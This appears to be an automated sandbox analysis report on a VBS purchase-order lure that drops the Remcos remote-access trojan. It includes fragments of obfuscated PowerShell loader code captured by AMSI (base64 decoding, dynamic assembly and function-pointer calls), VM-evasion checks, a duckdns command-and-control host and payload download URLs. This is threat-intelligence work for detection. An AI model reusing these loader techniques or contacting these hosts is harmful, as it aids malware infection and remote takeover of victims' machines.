Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior

Source: Yara match	File source: 00000006.00000002.2420398899.000000000BB20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2420231333.0000000008AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2405265854.0000000005D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($stokesia)$glObal:SPkKEDe = [SysTem.texT.EnCODinG]::ASciI.GetStrINg($SENgenE)$GLOBaL:MulTibirtH=$spkKede.sUbsTrING($koNtoraSsiSTENtenS153,$FEjldIsponeRES)<#Borgerhusenes Engenderment
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Retransmissive $Tape $Gildningen), (Ekstravagerer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Outpresses = [AppDomain]::CurrentDomain.GetAssemblies()$g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Garboils)), $Drivgarnsfiskerierseetroot).DefineDynamicModule($Turnxw202, $false).DefineType($villigstes, $cyphellae, [System.Multicast
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($stokesia)$glObal:SPkKEDe = [SysTem.texT.EnCODinG]::ASciI.GetStrINg($SENgenE)$GLOBaL:MulTibirtH=$spkKede.sUbsTrING($koNtoraSsiSTENtenS153,$FEjldIsponeRES)<#Borgerhusenes Engenderment

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848E8C4B0 push eax; iretd	4_2_00007FF848E8C4D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848F593F8 pushad ; retf	4_2_00007FF848F593F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04ADCCC8 pushfd ; ret	6_2_04ADCCC9

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5483	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4411	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5832	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3974	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 3552	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6616	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 320	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6120	Thread sleep count: 237 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6120	Thread sleep time: -118500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572	Thread sleep count: 317 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572	Thread sleep time: -951000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572	Thread sleep count: 9182 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572	Thread sleep time: -27546000s >= -30000s	Jump to behavior

Source: wscript.exe, 00000000.00000003.2065459520.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000003.2047830976.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065709106.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048467850.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063713785.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046230842.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2064439033.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045500545.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2066779885.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045973752.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2213928441.000001A2E32D9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3317523548.0000000000776000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.2066650226.000001FB2F908000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048216203.000001FB2F905000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046040317.000001FB2F8E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046230842.000001FB2F908000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063713785.000001FB2F907000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: Yara match	File source: amsi64_576.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR

Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager(
Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerb

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Windows Analysis Report nOrden_de_Compra___0001245.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
nOrden_de_Compra___0001245.vbs

Malware Threat Intel
Provided by

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.236.203.101	fumecexpsales1international.duckdns.org	Romania		9009	M247GB	true
200.6.118.162	torresvmackenna.cl	Chile		27659	IngenieriaeInformaticaAsociadaLtdaIIALtdaCL	false

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
fumecexpsales1international.duckdns.org	185.236.203.101	true
torresvmackenna.cl	200.6.118.162	true

Name	Malicious	Antivirus Detection	Reputation
https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin	false		unknown
https://torresvmackenna.cl/bin/Interplea.snp	false		unknown

ID:	1545815
Product:	CloudBasic
Start time:	04:01:04
Start date:	31.10.2024
Sample:	nOrden_de_Compra___0001245.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	44f5fc0dbe40738a8d1da8a520c37ade
SHA1:	1ae7e777e876136b30aec574f10215ef672ff451
SHA256:	4c9a883ec5718156811bee47cca44c3115f1dcb04ecc6541192e807ec1952e85
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\remcos\logs.dat	data	1996C3A93DF3BC0A9D18679B930FE8FE	57224E6025519371731171F264380FE504B8A49D	1FAE00BEDCD248C9A88B9A04095CC2614544B8D4E04FD129677A431CE79BB4E0
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	49AEBF8CBD62D92AC215B2923FB1B9F5	1723BE06719828DDA65AD804298D0431F6AFF976	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	D08FD6A9F7CB5F7AFD1E034AD5BB4267	7ECB052953A0C6548E1D66048F40FFEFC946505C	85D8845F38E6D6DC52141D218771CABF1FDE32D0A62C38E56B05293774F28AB4
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	106D01F562D751E62B702803895E93E0	CBF19C2392BDFA8C2209F8534616CCA08EE01A92	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F23953D4A58E404FCB67ADD0C45EB27A	2D75B5CACF2916C66E440F19F6B3B21DFD289340	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_302qice3.01n.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hypfsfn3.qtz.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuen13te.5on.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3qauho0.q5l.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Trkfugl.Chr	ASCII text, with very long lines (65536), with no line terminators	FFDFC961099B3A61A7CFA09AB2ED144D	A6CCB58EB8E3B9F2C0064A7BB68810C90B2F3CEA	E9E24E5E5941176D36D390CB936A8689D3AC767D4AC680392F9E63C6D4F22F70